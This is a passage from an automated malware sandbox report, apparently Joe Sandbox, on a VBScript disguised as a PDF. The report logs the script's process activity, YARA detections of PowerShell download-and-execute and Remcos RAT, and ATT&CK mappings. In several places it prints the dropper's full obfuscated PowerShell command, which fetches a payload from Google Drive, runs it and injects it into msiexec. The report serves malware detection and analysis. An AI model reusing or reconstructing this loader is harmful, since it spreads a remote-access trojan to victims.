              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4737Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5175Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7708Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2013Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000002.00000002.1619913276.00000291EDA3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7756.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7756, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8088, type: MEMORYSTR
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4160000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2ECFA38Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbtBeho,( Ceph$ShrugCLeonohMetodr RecuiBord sPlumatMarvei BermaPylorn OversOpmunfB,rmeeKonf lMonopdFuldveSpo trCodifeDecay)Upli ');Stungen (Omhng120 'overs[HymenN Gl meDrylyt Hove.Iagt Sm scaeChalkr A csvskil iKursuc Min,eA jekPMinkfo arzi FormnMyrictMrkatM roteaSimuln Nsk aCarougSmedeerestirTypol] D.ct:Klu d:OnomaS Jaw eUre.ecro eruLkkerrEnjoyi.entetHercyyAfs.iPMeninr CongoSlumbtNarrooReduccHyperoDuntplNeatn Stan.=Still Optim[Un erNVentueAnthrtI tax.BallfSIngeneM,rphc ntrouSkaber c,lpiV rdetgraviySulfaPT.ykkrOrd eoSolbatElekto UnoccNervio FritlJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#staggers eudoxian basilikummens bonuspoint tabskontoers skallesmkkeren #>;$lyserde='showery';<#lennoaceous reetableringen retrieveren personificerende engladden trkloset #>;$paradoksal=$host.privatedata;if ($paradoksal) {$veratrize++;}function omhng120($serranid){$dekaterer=$shockedness+$serranid.length-$veratrize;for( $triphosphate=5;$triphosphate -lt $dekaterer;$triphosphate+=6){$noosphere+=$serranid[$triphosphate];}$noosphere;}function stungen($mermithergate){ . ($psychogram) ($mermithergate);}$attributvrdierne=omhng120 ' s apmtrougok ncezstivnigen.rlseminlkysteain.an/ apof5dr,je.unreh0 u op sikk (kimmewmarblitilb,nbr.lldnonv.o fo,gwfo hisgenm. kv.ln laditigang ducat1tor j0roeku.schis0mis t;c,odp nonefw paneifunkintegne6bnk v4dripp; eth clywdxperfo6 otto4nomog;yuruj ompharch.fsvcykel:unrev1 al g2monol1dagbo.ersta0janic) pole hyperg en,memini cheatek almiohu.ge/u sty2strat0c ntr1afko 0 u ig0ulsel1lr.om0 un u1 tak detaifef eris,andrend.oe yltefp ukiorovsexdopin/anemo1os,el2di co1st,rs.forva0tub r ';$odelet=omhng120 'stenauhomopsinvesevasofra omv-vejl,areintg sti,edvornnaficitefter ';$exaltations=omhng120 '.ndechsv retme,antmaoprpfeoffs exp,: cach/h ved/deni dvel,frbespiiantifvdiesee,ncau.af tagild uo op.aospildgpedomludrkeegabes. x muc s.rbovrdstmska.d/vildsu bestc udho?casime.ragixstreep suf.opacifr fedttacade=groutdm ntaogho twfyrrenculo lrenteo.ermiadoku d rut & awahihesped a li=sytte1aquifzpseuddtalmayreshvbnobblzlygteyscala4 onunw onarrowsnmun.omwnonh.yfac.ekegoceb outsusvaletunderl irrogal ebvprokua snusn h litslito9nertswowlytx nr ehfreigqimmollme siwprizesglem bbimlecspr n ';$christiansfeldere=omhng120 'optan>rapso ';$psychogram=omhng120 'cantaib odee atyrxasymp ';$nonexaggeration='kassemangelens238';$astrography='\sternman224.ill';stungen (omhng120 'a nde$rainmg aledlnonexoforklbcountaplettlbenzo:padraiopr ts.ntgetbrandamlersnvicekdparitsadmintw.isttstride su lng garddelegesedim= dr,b$ snrleentern igurvkompl: overa sk lpoverfphintidproklaexuditlandsastikb+sharp$ inteanonhysimitatreg orbrys ot ykkgut ovr uninabescopt nnih choryaf ig ');stungen (omhng120 ' rnd$ tab gm,tallpreococondubsemita tilfl urf:sn ckssingeetricorfjerdic,appatricot slosebulbil angryv der=lema $ akade lndfx tuscahookslcobantpa deabulbitjunioinonunobiblinelectsunde,. rei,s sc.epadr nl arguimarvbtbeho,( ceph$shrugcleonohmetodr recuibord splumatmarvei bermapylorn oversopmunfb,rmeekonf lmonopdfuldvespo trcodifedecay)upli ');stungen (omhng120 'overs[hymenn gl medrylyt hove.iagt sm scaechalkr a csvskil ikursuc min,ea jekpminkfo arzi formnmyrictmrkatm roteasimuln nsk acarougsmedeerestirtypol] d.ct:klu d:onomas jaw eure.ecro erulkkerrenjoyi.entethercyyafs.ipmeninr congoslumbtnarrooreducchyperoduntplneatn stan.=still optim[un ernventueanthrti tax.ballfsingenem,rphc ntrouskaber c,lpiv rdetgraviysulfapt.ykkrord eosolbatelekto unoccnervio fritl
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#staggers eudoxian basilikummens bonuspoint tabskontoers skallesmkkeren #>;$lyserde='showery';<#lennoaceous reetableringen retrieveren personificerende engladden trkloset #>;$paradoksal=$host.privatedata;if ($paradoksal) {$veratrize++;}function omhng120($serranid){$dekaterer=$shockedness+$serranid.length-$veratrize;for( $triphosphate=5;$triphosphate -lt $dekaterer;$triphosphate+=6){$noosphere+=$serranid[$triphosphate];}$noosphere;}function stungen($mermithergate){ . ($psychogram) ($mermithergate);}$attributvrdierne=omhng120 ' s apmtrougok ncezstivnigen.rlseminlkysteain.an/ apof5dr,je.unreh0 u op sikk (kimmewmarblitilb,nbr.lldnonv.o fo,gwfo hisgenm. kv.ln laditigang ducat1tor j0roeku.schis0mis t;c,odp nonefw paneifunkintegne6bnk v4dripp; eth clywdxperfo6 otto4nomog;yuruj ompharch.fsvcykel:unrev1 al g2monol1dagbo.ersta0janic) pole hyperg en,memini cheatek almiohu.ge/u sty2strat0c ntr1afko 0 u ig0ulsel1lr.om0 un u1 tak detaifef eris,andrend.oe yltefp ukiorovsexdopin/anemo1os,el2di co1st,rs.forva0tub r ';$odelet=omhng120 'stenauhomopsinvesevasofra omv-vejl,areintg sti,edvornnaficitefter ';$exaltations=omhng120 '.ndechsv retme,antmaoprpfeoffs exp,: cach/h ved/deni dvel,frbespiiantifvdiesee,ncau.af tagild uo op.aospildgpedomludrkeegabes. x muc s.rbovrdstmska.d/vildsu bestc udho?casime.ragixstreep suf.opacifr fedttacade=groutdm ntaogho twfyrrenculo lrenteo.ermiadoku d rut & awahihesped a li=sytte1aquifzpseuddtalmayreshvbnobblzlygteyscala4 onunw onarrowsnmun.omwnonh.yfac.ekegoceb outsusvaletunderl irrogal ebvprokua snusn h litslito9nertswowlytx nr ehfreigqimmollme siwprizesglem bbimlecspr n ';$christiansfeldere=omhng120 'optan>rapso ';$psychogram=omhng120 'cantaib odee atyrxasymp ';$nonexaggeration='kassemangelens238';$astrography='\sternman224.ill';stungen (omhng120 'a nde$rainmg aledlnonexoforklbcountaplettlbenzo:padraiopr ts.ntgetbrandamlersnvicekdparitsadmintw.isttstride su lng garddelegesedim= dr,b$ snrleentern igurvkompl: overa sk lpoverfphintidproklaexuditlandsastikb+sharp$ inteanonhysimitatreg orbrys ot ykkgut ovr uninabescopt nnih choryaf ig ');stungen (omhng120 ' rnd$ tab gm,tallpreococondubsemita tilfl urf:sn ckssingeetricorfjerdic,appatricot slosebulbil angryv der=lema $ akade lndfx tuscahookslcobantpa deabulbitjunioinonunobiblinelectsunde,. rei,s sc.epadr nl arguimarvbtbeho,( ceph$shrugcleonohmetodr recuibord splumatmarvei bermapylorn oversopmunfb,rmeekonf lmonopdfuldvespo trcodifedecay)upli ');stungen (omhng120 'overs[hymenn gl medrylyt hove.iagt sm scaechalkr a csvskil ikursuc min,ea jekpminkfo arzi formnmyrictmrkatm roteasimuln nsk acarougsmedeerestirtypol] d.ct:klu d:onomas jaw eure.ecro erulkkerrenjoyi.entethercyyafs.ipmeninr congoslumbtnarrooreducchyperoduntplneatn stan.=still optim[un ernventueanthrti tax.ballfsingenem,rphc ntrouskaber c,lpiv rdetgraviysulfapt.ykkrord eosolbatelekto unoccnervio fritl
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#staggers eudoxian basilikummens bonuspoint tabskontoers skallesmkkeren #>;$lyserde='showery';<#lennoaceous reetableringen retrieveren personificerende engladden trkloset #>;$paradoksal=$host.privatedata;if ($paradoksal) {$veratrize++;}function omhng120($serranid){$dekaterer=$shockedness+$serranid.length-$veratrize;for( $triphosphate=5;$triphosphate -lt $dekaterer;$triphosphate+=6){$noosphere+=$serranid[$triphosphate];}$noosphere;}function stungen($mermithergate){ . ($psychogram) ($mermithergate);}$attributvrdierne=omhng120 ' s apmtrougok ncezstivnigen.rlseminlkysteain.an/ apof5dr,je.unreh0 u op sikk (kimmewmarblitilb,nbr.lldnonv.o fo,gwfo hisgenm. kv.ln laditigang ducat1tor j0roeku.schis0mis t;c,odp nonefw paneifunkintegne6bnk v4dripp; eth clywdxperfo6 otto4nomog;yuruj ompharch.fsvcykel:unrev1 al g2monol1dagbo.ersta0janic) pole hyperg en,memini cheatek almiohu.ge/u sty2strat0c ntr1afko 0 u ig0ulsel1lr.om0 un u1 tak detaifef eris,andrend.oe yltefp ukiorovsexdopin/anemo1os,el2di co1st,rs.forva0tub r ';$odelet=omhng120 'stenauhomopsinvesevasofra omv-vejl,areintg sti,edvornnaficitefter ';$exaltations=omhng120 '.ndechsv retme,antmaoprpfeoffs exp,: cach/h ved/deni dvel,frbespiiantifvdiesee,ncau.af tagild uo op.aospildgpedomludrkeegabes. x muc s.rbovrdstmska.d/vildsu bestc udho?casime.ragixstreep suf.opacifr fedttacade=groutdm ntaogho twfyrrenculo lrenteo.ermiadoku d rut & awahihesped a li=sytte1aquifzpseuddtalmayreshvbnobblzlygteyscala4 onunw onarrowsnmun.omwnonh.yfac.ekegoceb outsusvaletunderl irrogal ebvprokua snusn h litslito9nertswowlytx nr ehfreigqimmollme siwprizesglem bbimlecspr n ';$christiansfeldere=omhng120 'optan>rapso ';$psychogram=omhng120 'cantaib odee atyrxasymp ';$nonexaggeration='kassemangelens238';$astrography='\sternman224.ill';stungen (omhng120 'a nde$rainmg aledlnonexoforklbcountaplettlbenzo:padraiopr ts.ntgetbrandamlersnvicekdparitsadmintw.isttstride su lng garddelegesedim= dr,b$ snrleentern igurvkompl: overa sk lpoverfphintidproklaexuditlandsastikb+sharp$ inteanonhysimitatreg orbrys ot ykkgut ovr uninabescopt nnih choryaf ig ');stungen (omhng120 ' rnd$ tab gm,tallpreococondubsemita tilfl urf:sn ckssingeetricorfjerdic,appatricot slosebulbil angryv der=lema $ akade lndfx tuscahookslcobantpa deabulbitjunioinonunobiblinelectsunde,. rei,s sc.epadr nl arguimarvbtbeho,( ceph$shrugcleonohmetodr recuibord splumatmarvei bermapylorn oversopmunfb,rmeekonf lmonopdfuldvespo trcodifedecay)upli ');stungen (omhng120 'overs[hymenn gl medrylyt hove.iagt sm scaechalkr a csvskil ikursuc min,ea jekpminkfo arzi formnmyrictmrkatm roteasimuln nsk acarougsmedeerestirtypol] d.ct:klu d:onomas jaw eure.ecro erulkkerrenjoyi.entethercyyafs.ipmeninr congoslumbtnarrooreducchyperoduntplneatn stan.=still optim[un ernventueanthrti tax.ballfsingenem,rphc ntrouskaber c,lpiv rdetgraviysulfapt.ykkrord eosolbatelekto unoccnervio fritlJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0Jump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		221
              Scripting              		111
              Process Injection              		1
              Masquerading              		OS Credential Dumping11
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		31
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Remote Access Software              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)111
              Process Injection              		Security Account Manager31
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging113
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523159 Sample: A 413736796#U00b7pdf.vbs Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 25 drive.usercontent.google.com 2->25 27 drive.google.com 2->27 37 Multi AV Scanner detection for domain / URL 2->37 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 8 other signatures 2->43 8 wscript.exe 1 2->8         started        11 powershell.exe 18 2->11         started        13 msiexec.exe 2->13         started        signatures3 process4 signatures5 45 VBScript performs obfuscated calls to suspicious functions 8->45 47 Suspicious powershell command line found 8->47 49 Wscript starts Powershell (via cmd or directly) 8->49 55 2 other signatures 8->55 15 powershell.exe 14 18 8->15         started        51 Writes to foreign memory regions 11->51 53 Found suspicious powershell code related to unpacking or dynamic code loading 11->53 19 msiexec.exe 6 11->19         started        21 conhost.exe 11->21         started        process6 dnsIp7 29 drive.usercontent.google.com 142.250.184.193, 443, 49706, 49709 GOOGLEUS United States 15->29 31 drive.google.com 172.217.16.206, 443, 49705, 49708 GOOGLEUS United States 15->31 33 Found suspicious powershell code related to unpacking or dynamic code loading 15->33 23 conhost.exe 15->23         started        35 Detected Remcos RAT 19->35 signatures8 process9

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              A 413736796#U00b7pdf.vbs8%ReversingLabsWin32.Trojan.Generic
              A 413736796#U00b7pdf.vbs11%VirustotalBrowse

              Dropped Files

              No Antivirus matches

